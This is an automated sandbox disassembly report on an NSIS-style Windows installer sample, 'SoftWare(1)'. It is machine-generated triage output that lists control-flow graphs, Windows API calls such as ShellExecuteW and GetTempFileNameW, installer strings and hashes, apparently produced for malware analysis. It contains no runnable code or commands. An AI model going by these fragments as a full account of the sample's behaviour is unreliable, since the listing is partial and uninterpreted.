                                                                                                                                                                                                                                      control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                      • Inst, xrefs: 00403698
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                      • soft, xrefs: 004036A1
                                                                                                                                                                                                                                      • Null, xrefs: 004036AA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00445D80,00426D79,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D79,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2740478559-0
                                                                                                                                                                                                                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(00785918), ref: 00402387
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                      • String ID: Exch: stack < %d elements$LikedShortcutsGives$Pop: stack empty
                                                                                                                                                                                                                                      • API String ID: 1459762280-1698058190
                                                                                                                                                                                                                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(00785918), ref: 00402387
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                      • String ID: <RM>$LikedShortcutsGives$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                      • API String ID: 247603264-3062818838
                                                                                                                                                                                                                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D79,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
